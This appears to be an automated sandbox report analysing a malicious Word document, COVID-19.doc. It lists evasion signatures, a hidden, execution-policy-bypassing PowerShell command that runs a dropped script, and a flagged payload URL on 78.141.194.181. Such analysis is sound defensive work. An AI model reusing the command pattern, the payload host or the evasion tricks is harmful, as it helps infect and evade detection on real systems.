Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Document contains an embedded VBA which reads its own file name (might be used to evade sandboxes)
Source: COVID-19.doc Stream path 'Macros/VBA/ThisDocument' : found possibly 'ActiveDocument.Name' functions activedocument.name
Source: VBA code instrumentation OLE, VBA macro: Module ThisDocument, Function Document_Open, found possibly 'ActiveDocument.Name' functions activedocument.name Name: Document_Open
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 2752 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 532 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: powershell.exe, 00000004.00000002.2095015204.000000000028E000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Network Connect: 78.141.194.181 80 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ex bypass -win hid -f C:\Users\user\Desktop\COVID-19.ps1 Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 341993 Sample: COVID-19.doc Startdate: 20/01/2021 Architecture: WINDOWS Score: 80 24 Document contains an embedded macro with GUI obfuscation 2->24 26 Machine Learning detection for sample 2->26 28 Document contains an embedded VBA macro which might access itself as a file (possible anti-VM) 2->28 30 3 other signatures 2->30 7 WINWORD.EXE 436 33 2->7         started        process3 file4 18 C:\Users\user\Desktop\COVID-19.tmp, ASCII 7->18 dropped 32 Document exploit detected (process start blacklist hit) 7->32 34 Suspicious javascript / visual basic script found (invalid extension) 7->34 11 wscript.exe 13 7->11         started        signatures5 process6 dnsIp7 22 78.141.194.181, 49165, 80 AS-CHOOPAUS France 11->22 20 C:\Users\user\Desktop\COVID-19.ps1, Little-endian 11->20 dropped 36 System process connects to network (likely due to code injection or exploit) 11->36 38 Wscript starts Powershell (via cmd or directly) 11->38 16 powershell.exe 6 11->16         started        file8 signatures9 process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
78.141.194.181
 unknown France
20473 AS-CHOOPAUS true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://78.141.194.181/d569872345345.txt true
  • Avira URL Cloud: safe
 unknown